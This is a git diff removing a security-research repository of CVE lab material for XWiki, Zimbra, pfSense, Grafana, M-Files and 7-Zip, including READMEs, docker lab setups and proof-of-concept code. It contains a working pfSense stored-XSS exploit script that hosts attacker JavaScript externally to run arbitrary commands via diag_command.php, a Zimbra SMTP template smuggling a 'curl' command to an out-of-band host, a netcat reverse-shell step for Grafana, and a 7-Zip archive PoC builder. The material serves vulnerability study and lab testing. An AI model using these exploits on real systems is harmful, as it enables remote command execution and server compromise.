diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..f8ff2b5 --- /dev/null +++ b/.gitattributes @@ -0,0 +1 @@ +*.mp4 filter=lfs diff=lfs merge=lfs -text diff --git a/CVE-2020-7660/Readme.md b/CVE-2020-7660/Readme.md deleted file mode 100644 index 6a3e980..0000000 --- a/CVE-2020-7660/Readme.md +++ /dev/null @@ -1,6 +0,0 @@ -# Description - -serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function "deleteFunctions" within "index.js". - -## More details to be added. - diff --git a/CVE-2024-31982/README.md b/CVE-2024-31982/README.md deleted file mode 100644 index 11c2366..0000000 --- a/CVE-2024-31982/README.md +++ /dev/null 
@@ -1,73 +0,0 @@ -# CVE-2024-31982 - XWiki Remote Code Execution (RCE) - -## Overview -**CVE-2024-31982** is a **Remote Code Execution (RCE)** vulnerability discovered in **XWiki**, a popular open-source wiki platform. The vulnerability exists in the **xwiki-platform-search-ui** component, allowing an attacker to execute arbitrary commands on the server due to improper input validation. - -## Affected Versions -The following versions of `org.xwiki.platform:xwiki-platform-search-ui` are vulnerable: - -- **2.4-milestone-1** up to **before 14.10.20** -- **15.0-rc-1** up to **before 15.5.4** -- **15.6-rc-1** up to **before 15.10-rc-1** - -### Patched Versions: -- **14.10.20** -- **15.5.4** -- **15.10-rc-1** - -## Root Cause -The vulnerability arises due to **insufficient input validation** in the search functionality. XWiki fails to properly sanitize user-controlled input, which can lead to command injection, allowing attackers to execute arbitrary system commands remotely. - -## Impact -A successful exploit of **CVE-2024-31982** can allow an attacker to: -- Execute arbitrary system commands on the XWiki server. -- Gain unauthorized access to sensitive data. -- Compromise the underlying infrastructure. -- Potentially achieve full server takeover. - -## Exploitation Scenario -An attacker can exploit this vulnerability by injecting malicious input through the XWiki search feature or another exposed endpoint. If the input is executed by the server without proper sanitization, it can lead to **Remote Code Execution**. - -## Mitigation -To protect against **CVE-2024-31982**, users should: -1. **Update XWiki** to one of the patched versions: - - **14.10.20** - - **15.5.4** - - **15.10-rc-1** -2. Restrict access to the XWiki search feature if unnecessary. -3. Implement Web Application Firewalls (WAF) to detect and block suspicious input. -4. Regularly audit logs for signs of exploitation. 
- -## References -- [XWiki Official Site](https://www.xwiki.org/) -- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31982) - -> ⚠ **Disclaimer:** This information is provided for educational and research purposes only. Exploiting vulnerabilities in unauthorized environments is illegal. - ---- - -# How to Set Up the Vulnerable Lab -1. Clone the Repository (or create a new directory) - -``` -git clone https://github.com/your-repo/xwiki-cve-2024-31982 -cd xwiki-cve-2024-31982 -``` - -2. Run the Lab -``` - docker-compose up -d -``` - -3. Access XWiki -Open http://localhost:8080/ in your browser. - -4. Stop the Lab -``` -docker-compose down -``` - -5. Clean Up (If Needed) -``` -docker volume prune -f -``` diff --git a/CVE-2024-31982/docker-compose.yml b/CVE-2024-31982/docker-compose.yml deleted file mode 100644 index aadd139..0000000 --- a/CVE-2024-31982/docker-compose.yml +++ /dev/null @@ -1,37 +0,0 @@ -version: '3.8' - -services: - postgres: - image: postgres:latest - container_name: postgres-xwiki - restart: always - networks: - - xwiki-net - environment: - POSTGRES_USER: xwiki - POSTGRES_PASSWORD: xwiki - POSTGRES_DB: xwiki - volumes: - - postgres_data:/var/lib/postgresql/data - - xwiki: - image: xwiki:14.10.17-postgres-tomcat # Vulnerable Version - container_name: xwiki - restart: always - depends_on: - - postgres - networks: - - xwiki-net - ports: - - "8080:8080" - environment: - DB_USER: xwiki - DB_PASSWORD: xwiki - DB_DATABASE: xwiki - DB_HOST: postgres - -networks: - xwiki-net: - -volumes: - postgres_data: diff --git a/CVE-2024-31982/out-3.ogv b/CVE-2024-31982/out-3.ogv deleted file mode 100644 index 9fcaf22..0000000 Binary files a/CVE-2024-31982/out-3.ogv and /dev/null differ diff --git a/CVE-2024-45519/CVE-2024-45519.yaml b/CVE-2024-45519/CVE-2024-45519.yaml deleted file mode 100644 index 25da95c..0000000 --- a/CVE-2024-45519/CVE-2024-45519.yaml +++ /dev/null 
@@ -1,63 +0,0 @@ -id: CVE-2024-45519 - -info: - name: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution - author: pdresearch,iamnoooob,parthmalhotra,ice3man543 - severity: critical - description: | - SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality. - reference: - - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories - - https://blog.projectdiscovery.io/zimbra-remote-code-execution/ - classification: - cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* - metadata: - vendor: synacor - product: zimbra_collaboration_suite - shodan-query: - - http.title:"zimbra collaboration suite" - - http.title:"zimbra web client sign in" - - http.favicon.hash:1624375939 - fofa-query: - - title="zimbra web client sign in" - - title="zimbra collaboration suite" - tags: cve,cve2024,rce,zimbra - -javascript: - - pre-condition: | - isPortOpen(Host,Port); - code: | - let m = require('nuclei/net'); - let address = Host+":"+Port; - let conn; - conn= m.Open('tcp', address) - conn.Send('EHLO localhost\r\n'); - conn.RecvString() - conn.Send('MAIL FROM: \r\n'); - conn.RecvString() - conn.Send('RCPT TO: <"aabbb$(curl${IFS}'+oast+')"@mail.domain.com>\r\n'); - conn.RecvString() - conn.Send('DATA\r\n'); - conn.RecvString() - conn.Send('aaa\r\n'); - conn.RecvString() - conn.Send('.\r\n'); - resp = conn.RecvString() - conn.Send('QUIT\r\n'); - conn.Close() - resp - args: - Host: "{{Host}}" - Port: 25 - oast: "{{interactsh-url}}" - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word 
- words: - - "message delivered" diff --git a/CVE-2024-45519/README.md b/CVE-2024-45519/README.md deleted file mode 100644 index 41edb13..0000000 --- a/CVE-2024-45519/README.md +++ /dev/null 
@@ -1,70 +0,0 @@ -# CVE-2024-45519 Breakdown and Root Cause Analysis (Under the Supervision of Swati Laxmi) - -### Overview of Zimbra Collaboration Suite -Zimbra Collaboration Suite (ZCS) is a widely-used open-source platform that provides email and collaboration services, including calendaring, contacts, tasks, and chat. Renowned for its flexibility and open-source nature, Zimbra is often chosen by organizations as an alternative to proprietary solutions, particularly in educational institutions, government agencies, and enterprises. Given its broad adoption, Zimbra is a critical target for attackers. Vulnerabilities in this platform can have far-reaching effects, making security crucial. Through extensive research, I have gained a thorough understanding of the root cause of the vulnerability in the package. - -### The Importance of Remote Command Execution Vulnerabilities -Remote Command Execution (RCE) vulnerabilities are among the most dangerous as they allow attackers to execute arbitrary commands on a target server. This type of vulnerability grants attackers direct access to the underlying system, which can lead to serious security breaches, including data compromise, privilege escalation, and lateral movement within a network. For collaborative platforms like Zimbra, RCE vulnerabilities are especially impactful, as they can expose an organization's communication infrastructure and lead to significant data breaches and operational disruptions. Imagine an attacker gaining control of your server’s shell, running arbitrary commands at will. - -### Overview of CVE-2024-45519 -CVE-2024-45519 is a recently discovered RCE vulnerability that affects specific versions of Zimbra Collaboration Suite. The vulnerability stems from insufficient input validation within Zimbra’s web application, allowing attackers to craft malicious requests that execute arbitrary commands on the server. 
Discovered in October 2024, CVE-2024-45519 has a high CVSS score of 9.4, which reflects its severe impact and ease of exploitation. Organizations using the affected versions of Zimbra are strongly urged to apply security patches promptly to mitigate the risks associated with this vulnerability. - -# Vulnerability Analysis - -### How CVE-2024-45519 Occurs -The vulnerability in CVE-2024-45519 arises from weak input validation within Zimbra’s web application. Certain fields in Zimbra's HTTP requests are not properly sanitized, allowing attackers to inject and execute malicious commands on the server. This insufficient input validation leads to a command injection vulnerability, where the attacker bypasses standard security checks and runs arbitrary commands. Upon deeper investigation, I discovered that the vulnerability is tied to the `postjournal` service, where I identified key differences in the paths that expose the vulnerability. - -![Difference](images/diff.png) - -### Why This Vulnerability is Exploitable -CVE-2024-45519 is exploitable because of Zimbra's relaxed input validation. Due to improper sanitization, certain fields in HTTP requests are vulnerable to command injection. Attackers can craft specially designed HTTP requests containing malicious payloads that the backend processes as legitimate commands, executing them with the privileges granted to the Zimbra service account. This lack of strict input handling makes it easy for attackers to manipulate the system. - -### Impact of Exploitation -Exploitation of CVE-2024-45519 provides attackers with the ability to run arbitrary commands on the Zimbra server. This access can lead to several severe consequences: - -- **Privilege Escalation**: Attackers can leverage this vulnerability to escalate their privileges, potentially gaining access to other sensitive areas of the server or network. 
-- **Data Compromise**: Attackers can read, modify, or delete emails, contacts, and other sensitive information stored within Zimbra. -- **Further Network Compromise**: Once inside Zimbra, attackers may pivot to other parts of the network, executing additional attacks and establishing persistence. - -In conclusion, CVE-2024-45519 represents a serious risk to Zimbra deployments. It underscores the need for robust input validation and timely patching to prevent unauthorized access and data breaches. - -## Lab Setup 🖥️ - -1. **Prepare the test environment** - Make sure you're running Ubuntu 20.04.6 LTS (Focal Fossa) on your lab machine. - Example test environment: Ubuntu 20.04.6 LTS. - -2. **Download Zimbra** - Run the following commands to download and extract the Zimbra Collaboration package: - ```bash - sudo su - wget https://files.zimbra.com/downloads/8.8.15_GA/zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220.tgz - tar -xvzf zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220.tgz - cd zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220 - ``` - -3. **Configure hostname** - Set the hostname to `zimbra.labo`: - ```bash - hostnamectl set-hostname zimbra.labo - ``` - -4. **Install Zimbra** - Follow the installation guide here 👉 [Zimbra Installation Guide](https://zimbra.github.io/installguides/latest/single.html#Installing_Zimbra_Collaboration_Software). - Use Zimbra's package repository when prompted. Select **Yes** for that option. - -5. **Replace the vulnerable `postjournal` binary** - Kill the running `postjournal` process and replace the binary with the vulnerable one: - ```bash - sudo pkill postjournal - dpkg-deb -x packages/zimbra-core_8.8.15.GA.4177.UBUNTU20.64_amd64.deb /tmp/zimbra-core - sudo cp /tmp/zimbra-core/opt/zimbra/libexec/postjournal /opt/zimbra/libexec/postjournal - ``` - -6. 
**Enable and restart Zimbra services** - Log in as the `zimbra` user and enable the `postjournal` service: - ```bash - sudo su - zimbra - zmlocalconfig -e postjournal_enabled=true - zmcontrol restart - ``` diff --git a/CVE-2024-45519/Resources.md b/CVE-2024-45519/Resources.md deleted file mode 100644 index 643bdb6..0000000 --- a/CVE-2024-45519/Resources.md +++ /dev/null @@ -1 +0,0 @@ -1. https://github.com/advisories/GHSA-fr4c-ch83-r968 diff --git a/CVE-2024-45519/images/Readme b/CVE-2024-45519/images/Readme deleted file mode 100644 index 8b13789..0000000 --- a/CVE-2024-45519/images/Readme +++ /dev/null @@ -1 +0,0 @@ - diff --git a/CVE-2024-45519/images/diff.png b/CVE-2024-45519/images/diff.png deleted file mode 100644 index 1432309..0000000 Binary files a/CVE-2024-45519/images/diff.png and /dev/null differ diff --git a/CVE-2024-45519/images/docker1.png b/CVE-2024-45519/images/docker1.png deleted file mode 100644 index 7ec9060..0000000 Binary files a/CVE-2024-45519/images/docker1.png and /dev/null differ diff --git a/CVE-2024-45519/images/flowchart.png b/CVE-2024-45519/images/flowchart.png deleted file mode 100644 index 02d3bc3..0000000 Binary files a/CVE-2024-45519/images/flowchart.png and /dev/null differ diff --git a/CVE-2024-45519/images/revers.png b/CVE-2024-45519/images/revers.png deleted file mode 100644 index 1476c87..0000000 Binary files a/CVE-2024-45519/images/revers.png and /dev/null differ diff --git a/CVE-2024-45519/images/vuln1.png b/CVE-2024-45519/images/vuln1.png deleted file mode 100644 index e3eec58..0000000 Binary files a/CVE-2024-45519/images/vuln1.png and /dev/null differ diff --git a/CVE-2024-46538/CVE-2024-46538.py b/CVE-2024-46538/CVE-2024-46538.py deleted file mode 100644 index 07e51e3..0000000 --- a/CVE-2024-46538/CVE-2024-46538.py +++ /dev/null 
@@ -1,230 +0,0 @@ -import re -from faker import Faker -import random -import string -import uuid -import requests -import time -import sys -import rich_click as click - -# Turn off the InsecureRequestWarning -requests.packages.urllib3.disable_warnings( - requests.packages.urllib3.exceptions.InsecureRequestWarning -) - -# Banner -banner = """ - .+@%%%@- - .:%%=::::::@. - .-*@@@@%+-::=%@%+--:@. - :#@*-..#%-:::::::::+@:=%@@%@@%= - -@#:....:@-::::::::::::=@....=@#--@ - .%#:.......:-:*%%%%%*-::::-@.......=@@. - ##.....................-*%@%=.........-@: - .@:.......................................#* - -@..........................................+# .:-----::.. .::.. - :@............................................+# *@@@@@@@@@@@@@% -%@@@@@@@@@@%- *%@@@@@@@@%#. -.@:.............................................%- %@@@@@@@@@@@@@@: %@@@@@@@@@@@@@@- *@@@@@@@@@@@@@@- -=#..............................................-@ %@@@@@@@@@@@@@@:-@@@@@@@@@@@@@@@-:@@@@@@@@@@@@@@@+ -#=...............................................@ .-=+++++%@@@@@:+@@@@: -@@@@@--@@@@*....=@@@@@+ -@:...............................................@ . .%@@@@@:+@@@@: =@@@@@-=@@@@- :@@@@@+ -@:...+@%*:..................:=#@+................@ *@@@@@@@@@@@@@@ +@@@@%::::%@@@@@-=@@@@* *@@@@@+ -%-...............................................@ @@@@@@@@@@@@@@= +@@@@@@@@@@@@@@@--@@@@@@@@@@@@@@@+ -=#....+%@%+.................=#%%*-..............-@ .@@@@@@@@@@@@%: %@@@@@@@@@@@@@@:.%@@@@@@@@@@@@@@= -.@...% .@@:.............+% %@@:............#= .@@@@@. -*%%@@@@@@@@@: =%@@@@@@@@@@@@- - :@.-= -+@+............:@. *%@%...........=# .@@@@@@@@@@@@@@* %@@@@@. .@@@@@@: - -@.=@@@%+#...=@%@@-.....:@@@@@ @:..........+% @@@@@@@@@@@@@@@ @@@@@@ .@@@@@@. 
- :@-:::::....-++=+:#:.....:=++=:...........** #@@@@@@@@@@@@@% %@@@@# .@@@@@# - %#::::.................:::::::........:@: =%@@@@@@@@@% #@@@@: #@@@@+ - .%#-::................:::::::......=@= - -@%:...........::..::::::::..=@# - @+@@%++*@#@+-:-+@*--=#%@*=** - %-:#.....%=........@=......:@ - *+.......%-.............+#..@ - @=......-@:......:%@%*#@@:.@# - -@%**#@+:%@*+@#+%...::..@.@-*% - :@.......%=.....@-..:@::%+.:::-@ - %-......=#......%-..::--:...:::@. - #+......:@......:@-::::::....:+% - -=+@=......+#.......%%-::::...-@*. - -+-::::+@@@@@@@=%@@@@@@@@@@@@@@@#-::-+: Author: EQST(Experts, Qualified Security Team) - .=++=-:::::::::::::--===+++++++++++++- Github: https://github.com/EQSTLab/CVE-2024-46538 - .:--====--:. - -Analysis base : https://github.com/physicszq/web_issue/blob/main/pfsense/interfaces_groups_edit_file.md_xss.md - -============================================================================================================= - -CVE-2024-46538 : PfSense XSS Vulnerability -description: A cross-site scripting (XSS) vulnerability in pfsense v2.5.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the $pconfig variable at interfaces_groups_edit.php. 
- -============================================================================================================= -""" - -class PfExploit: - - def __init__(self, id: str, pw: str, js: str, url: str, cmd: str): - self.loginId = id - self.loginPw = pw - self.url = url - self.cmd = cmd - self.jsId = None - self.jsUrl = js - self.jsSecret = None - self.fake = Faker() - - def greeting() -> None: - print(banner) - - def spinner(duration=10, interval=0.1): - spinner_chars = ['|', '/', '-', '\\'] - end_time = time.time() + duration - while time.time() < end_time: - for char in spinner_chars: - sys.stdout.write(f'\r[{char}] Loading, please wait...') - sys.stdout.flush() - time.sleep(interval) - print("") - - def add_protocol(self, url: str) -> str: - if not url.startswith(('http://', 'https://')): - return 'https://' + url - return url - - def getJS(self) -> None: - # Used api mocky to make callback - url = "https://api.mocky.io/api/mock" - cmd = self.cmd - - characters = string.ascii_letters # ascii letters to make random (Case sensitive) - secretRandom = ''.join(random.choice(characters) for _ in range(36)) - - body = { - "status":200, - "content":'var formData = new FormData();formData.append("__csrf_magic", csrfMagicToken);formData.append("txtCommand", "' + cmd + '");formData.append("txtRecallBuffer", "id");formData.append("submit", "EXEC");formData.append("dlPath", "");formData.append("ulfile", new Blob(), "");formData.append("txtPHPCommand", "");fetch("/diag_command.php", {method: "POST",body: formData}).then(response => response.text()).then(data => {const parser = new DOMParser();const doc = parser.parseFromString(data, "text/html");const contentDiv = doc.querySelector("div.content");if (contentDiv) {alert(contentDiv.textContent);} else {alert("No content found");}})', - "content_type":"application/javascript", - "charset":"UTF-8", - "secret":f"{secretRandom}", - "expiration":"never" - } - - response = requests.post(url, json=body, verify=False) - data = 
response.json() - self.jsId = data.get('id') - self.jsSecret = data.get('secret') - self.jsUrl = f"{data.get('link')}/{str(uuid.uuid4())}.js" - - def deleteJS(self) -> None: - url = f"https://api.mocky.io/api/mock/{self.jsId}" - body = {"id":f"{self.jsId}","secret":f"{self.jsSecret}"} - requests.delete(url, json=body, verify=False) - - def getCSRFToken(self, url, cookies="") -> str: - url = f"{url}" - response = requests.get(url, verify=False, cookies=cookies) - match = re.search(r" str: - # Get login csrf token - url = f"{self.add_protocol(self.url)}/index.php" - token = self.getCSRFToken(url) - response = requests.get(url, verify=False) - match = re.search(r" None: - # Get csrf token - url = f"{self.add_protocol(self.url)}/interfaces_groups_edit.php" - sessid = self.getSession() - cookies = { - 'PHPSESSID': sessid - } - token = self.getCSRFToken(url, cookies=cookies) - # Stored XSS Attack - url = f"{self.add_protocol(self.url)}/interfaces_groups_edit.php" - datas = { - '__csrf_magic':token, - 'ifname': self.fake.last_name(), - 'descr':'EQST_Lab_Pfsense_test', - 'members[]': f'wan', - 'save':'%E4%BF%9D%E5%AD%98' - } - response = requests.post(url, data=datas, cookies=cookies, verify=False, allow_redirects=False) - if response.status_code == 302: - print(f"[+] Done! 
Login Admin and check: \n{self.add_protocol(self.url)}/interfaces_groups.php") - return sessid - else: - print(f"[-] Attack Failed...") - exit(1) - -# argument parsing with rich_click -@click.command() -@click.option( - "-i", - "--id", - required=True, - help="Specify a id to login", -) -@click.option( - "-p", - "--pw", - required=True, - help="Specify a password to login", -) -@click.option( - "-u", - "--url", - required=True, - help="Specify a URL or domain for vulnerability detection", -) -@click.option( - "-c", - "--cmd", - default="id", - help="Specify the command to execute", -) -@click.option( - "-j", - "--js", - default="", - help="[Optional] Specify a Callback javascript URL" -) - -def main(id: str, pw: str, js: str, url: str, cmd: str) -> None: - cve_exploit = PfExploit(id, pw, js, url, cmd) - PfExploit.greeting() - PfExploit.spinner(duration=1) - # If js Url not exists - if cve_exploit.jsUrl == "": - cve_exploit.getJS() - cve_exploit.storeScript() - -if __name__ == "__main__": - main() diff --git a/CVE-2024-46538/README.md b/CVE-2024-46538/README.md deleted file mode 100644 index 99342c0..0000000 --- a/CVE-2024-46538/README.md +++ /dev/null 
@@ -1,51 +0,0 @@ -## Description - -A cross-site scripting (XSS) vulnerability in pfSense v2.5.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the `$pconfig` variable at `interfaces_groups_edit.php`. - ----- - -### References - -- [NVD CVE-2024-46538](https://nvd.nist.gov/vuln/detail/CVE-2024-46538) -- [GitHub Issue Report](https://github.com/physicszq/web_issue/blob/main/pfsense/interfaces_groups_edit_file.md_xss.md) -- [pfSense Redmine Issue #15778](https://redmine.pfsense.org/issues/15778) - ----- - -### CVSS v3 Base Metrics - -| Metric | Value | -|-----------------------|-----------| -| **Attack Vector** | Network | -| **Attack Complexity** | Low | -| **Privileges Required** | None | -| **User Interaction** | Required | -| **Scope** | Changed | -| **Confidentiality** | High | -| **Integrity** | High | -| **Availability** | None | - ----- - -## Steps to Set Up and Reproduce the Lab - -1. **Download the Vulnerable Software** - [Download pfSense v2.5.2](https://github.com/CloudSentralDotNet/iso_pfsense). Make sure to select version 2.5.2. - -2. **Set Up Your Virtual Lab** - Prepare two virtual machines: one as the attacker machine and another to host the pfSense software. - - *(Images can be added here for visual guidance)* - -3. **Start pfSense and Log In** - - Launch pfSense and log in with the default credentials: - - **Username**: `admin` - - **Password**: `pfsense` - - Once logged in, obtain the IP address where pfSense is running for further configuration. - *(You can change the credentials as needed.)* - -4. **Run the Proof of Concept (PoC) Script** - Use the PoC script to establish a connection and trigger the vulnerability. - -5. **Confirm XSS Execution** - In this demonstration, `/etc/passwd` is used to show the impact of the XSS vulnerability, highlighting the potential consequences for testing purposes. 
diff --git a/CVE-2024-46538/demo/README b/CVE-2024-46538/demo/README deleted file mode 100644 index cdf4cb4..0000000 --- a/CVE-2024-46538/demo/README +++ /dev/null @@ -1 +0,0 @@ -! diff --git a/CVE-2024-46538/demo/demo.mp4 b/CVE-2024-46538/demo/demo.mp4 deleted file mode 100644 index 88f3bcc..0000000 Binary files a/CVE-2024-46538/demo/demo.mp4 and /dev/null differ diff --git a/CVE-2024-46538/pictures/README b/CVE-2024-46538/pictures/README deleted file mode 100644 index 8b13789..0000000 --- a/CVE-2024-46538/pictures/README +++ /dev/null @@ -1 +0,0 @@ - diff --git a/CVE-2024-46538/pictures/Screenshot 2024-11-14 130710.png b/CVE-2024-46538/pictures/Screenshot 2024-11-14 130710.png deleted file mode 100644 index 2d7124e..0000000 Binary files a/CVE-2024-46538/pictures/Screenshot 2024-11-14 130710.png and /dev/null differ diff --git a/CVE-2024-46538/pictures/Screenshot 2024-11-14 130725.png b/CVE-2024-46538/pictures/Screenshot 2024-11-14 130725.png deleted file mode 100644 index 81ebee0..0000000 Binary files a/CVE-2024-46538/pictures/Screenshot 2024-11-14 130725.png and /dev/null differ diff --git a/CVE-2024-49113/Readme.md b/CVE-2024-49113/Readme.md deleted file mode 100644 index dd20a16..0000000 --- a/CVE-2024-49113/Readme.md +++ /dev/null @@ -1,6 +0,0 @@ -# Vulnerability -Authentication bypass condition in LDAP authentication in M-Files server versions before 24.11 supported usage of OpenLDAP configurations that allowed user authentication without a password when the LDAP server itself had the vulnerable configuration. - -# Reference - -https://github.com/SafeBreach-Labs/CVE-2024-49113 diff --git a/CVE-2024-9264/Dockerfile b/CVE-2024-9264/Dockerfile deleted file mode 100644 index bb570a8..0000000 --- a/CVE-2024-9264/Dockerfile +++ /dev/null 
@@ -1,15 +0,0 @@ -# Dockerfile -FROM grafana/grafana:11.0.0-ubuntu - -USER root - -# Install DuckDB -RUN apt-get update && apt-get install -y && apt-get install unzip -y \ - wget \ - && wget https://github.com/duckdb/duckdb/releases/download/v0.8.1/duckdb_cli-linux-amd64.zip \ - && unzip duckdb_cli-linux-amd64.zip -d /usr/local/bin/ \ - && chmod +x /usr/local/bin/duckdb \ - && rm duckdb_cli-linux-amd64.zip - -# Add DuckDB to the PATH -ENV PATH="/usr/local/bin:${PATH}" diff --git a/CVE-2024-9264/README.md b/CVE-2024-9264/README.md deleted file mode 100644 index 09f18aa..0000000 --- a/CVE-2024-9264/README.md +++ /dev/null 
@@ -1,58 +0,0 @@ -# Grafana SQL Expressions Vulnerability Allows Remote Code Execution - -![POC](pictures/poc.png) - -**CVE ID**: CVE-2024-9264 -**Date Published**: October 17, 2024 - -## Description - -The **SQL Expressions** experimental feature of **Grafana** allows for the evaluation of **DuckDB** queries that can contain user input. However, these queries are **insufficiently sanitized** before being passed to DuckDB, resulting in a **command injection** and **local file inclusion (LFI)** vulnerability. - -This vulnerability allows an attacker to execute arbitrary commands on the system and potentially read sensitive files, which can be exploited by any user with **VIEWER** or higher permissions in Grafana. - -The attack requires the **DuckDB binary** to be present in Grafana's **$PATH**, but by default, this binary is **not included** in Grafana distributions. If the binary is installed, however, the vulnerability can be exploited. - -The vulnerability was introduced in **Grafana version 11.0.0** and has been fixed in the following versions (for both OSS and Enterprise editions): - -- **11.0.5+security-01** -- **11.1.6+security-01** -- **11.2.1+security-01** -- **11.0.6+security-01** -- **11.1.7+security-01** -- **11.2.2+security-01** - -**Note**: The fixes have been provided for both the latest and previous patch versions of all impacted releases. This ensures that users who are still in the process of updating can mitigate the vulnerability immediately without requiring further changes. - ---- - -## Set Up Your Own Lab - -DuckDB is an open-source project, and the vulnerable build is available in their GitHub assets. Since it's open-source, there is nothing hidden, and you can manually download it. However, to simplify the process, you can use the Dockerfile provided in the repository. - -1. Visit [DuckDB releases](https://github.com/duckdb/duckdb/releases) and download version **0.8.1** (the version used for this demonstration). -2. 
Run the Dockerfile from the repository. -3. Once the container is up and running, access Grafana at [http://localhost:3000](http://localhost:3000). - ---- - -## Attack Scenario - -To exploit this vulnerability and achieve remote code execution, follow these steps: - -### 1. Set up a Netcat listener - -Start a Netcat listener on an unused port on your machine to catch the reverse shell: - -```bash -nc -lvp -``` - -Replace with any open, unused port on your machine. -### 2. Run the POC file - -Run the Proof of Concept (POC) file in Grafana that triggers the vulnerability. The POC will inject malicious code into the SQL expressions, causing the remote code execution. -### 3. Gain Access - -Once the attack is executed, you should have access to the system through the reverse shell opened by the Netcat listener. - diff --git a/CVE-2024-9264/demo/README b/CVE-2024-9264/demo/README deleted file mode 100644 index cdf4cb4..0000000 --- a/CVE-2024-9264/demo/README +++ /dev/null @@ -1 +0,0 @@ -! diff --git a/CVE-2024-9264/demo/demo.mp4 b/CVE-2024-9264/demo/demo.mp4 deleted file mode 100644 index 83f6939..0000000 Binary files a/CVE-2024-9264/demo/demo.mp4 and /dev/null differ diff --git a/CVE-2024-9264/docker-compose.yml b/CVE-2024-9264/docker-compose.yml deleted file mode 100644 index 94dbb16..0000000 --- a/CVE-2024-9264/docker-compose.yml +++ /dev/null 
@@ -1,40 +0,0 @@ -services: - mysql: - image: mysql:latest - restart: always - environment: - - MYSQL_ROOT_PASSWORD=rootpassword - - MYSQL_DATABASE=grafanadb - - MYSQL_USER=grafana - - MYSQL_PASSWORD=grafanapassword - volumes: - - ./mysql-data:/var/lib/mysql - ports: - - "3306:3306" - healthcheck: - test: ["CMD", "mysqladmin", "ping", "-h", "localhost"] - interval: 10s - timeout: 5s - retries: 3 - - grafana: - build: . - ports: - - "3000:3000" - environment: - - GF_SECURITY_ADMIN_PASSWORD=FreyXFI - - GF_DATABASE_TYPE=mysql - - GF_DATABASE_HOST=mysql:3306 - - GF_DATABASE_USER=grafana - - GF_DATABASE_PASSWORD=grafanapassword - - GF_DATABASE_NAME=grafanadb - volumes: - - grafana-storage:/var/lib/grafana - - ./grafana.ini:/etc/grafana/grafana.ini - - depends_on: - mysql: - condition: service_healthy -volumes: - grafana-storage: - mysql-storage: diff --git a/CVE-2024-9264/pictures/README b/CVE-2024-9264/pictures/README deleted file mode 100644 index 092bfb9..0000000 --- a/CVE-2024-9264/pictures/README +++ /dev/null @@ -1 +0,0 @@ -yo diff --git a/CVE-2024-9264/pictures/poc.png b/CVE-2024-9264/pictures/poc.png deleted file mode 100644 index 8c5211c..0000000 Binary files a/CVE-2024-9264/pictures/poc.png and /dev/null differ diff --git a/CVE-2025-0411/7-Zip-CVE-2025-0411-PoC.py b/CVE-2025-0411/7-Zip-CVE-2025-0411-PoC.py deleted file mode 100644 index 872d260..0000000 --- a/CVE-2025-0411/7-Zip-CVE-2025-0411-PoC.py +++ /dev/null 
@@ -1,79 +0,0 @@ -import os -import subprocess -import re - -VULNERABLE_VERSION_THRESHOLD = (24, 9) # 7-Zip versions prior to 24.09 are vulnerable - -def get_7zip_version(): - """Check if 7-Zip is installed and return its version.""" - try: - result = subprocess.run(["7z"], capture_output=True, text=True) - match = re.search(r"7-Zip (\d+)\.(\d+)", result.stdout) - if match: - major, minor = int(match.group(1)), int(match.group(2)) - return major, minor - except FileNotFoundError: - print("[!] 7-Zip is not installed or not in PATH.") - return None - return None - -def check_vulnerability(version): - """Check if the detected 7-Zip version is vulnerable (prior to 24.09).""" - return version < VULNERABLE_VERSION_THRESHOLD - -def compile_cpp(source_file, output_file): - """Compile a C++ file into an executable using g++.""" - if not os.path.exists(source_file): - print(f"[!] Source file '{source_file}' not found.") - return False - try: - subprocess.run(["g++", source_file, "-o", output_file, "-static", "-s"], check=True) - print(f"[+] Compiled: {output_file}") - return True - except subprocess.CalledProcessError as e: - print(f"[!] Compilation failed: {e}") - return False - -def compress_file(input_file, output_archive): - """Compress a file using 7-Zip.""" - if not os.path.exists(input_file): - print(f"[!] File '{input_file}' not found.") - return False - try: - subprocess.run(["7z", "a", output_archive, input_file], check=True) - print(f"[+] Created: {output_archive}") - return True - except subprocess.CalledProcessError as e: - print(f"[!] Compression failed: {e}") - return False - -def main(): - version = get_7zip_version() - if not version: - return - - print(f"[*] Detected 7-Zip version: {version[0]}.{version[1]}") - - if check_vulnerability(version): - print("[!] Vulnerable 7-Zip version detected!") - choice = input("[?] Do you want to continue? 
(y/n): ").strip().lower() - if choice != 'y': - print("[*] Exiting.") - return - else: - print("[*] 7-Zip is not vulnerable. Exiting.") - return - - cpp_file = "executable.cpp" - exe_file = "compiled.exe" - - if not compile_cpp(cpp_file, exe_file): - return - - if not compress_file(exe_file, "first_compressed.7z"): - return - - compress_file("first_compressed.7z", "double_compressed.7z") - -if __name__ == "__main__": - main() diff --git a/CVE-2025-0411/executable.cpp b/CVE-2025-0411/executable.cpp deleted file mode 100644 index 032bd9d..0000000 --- a/CVE-2025-0411/executable.cpp +++ /dev/null 
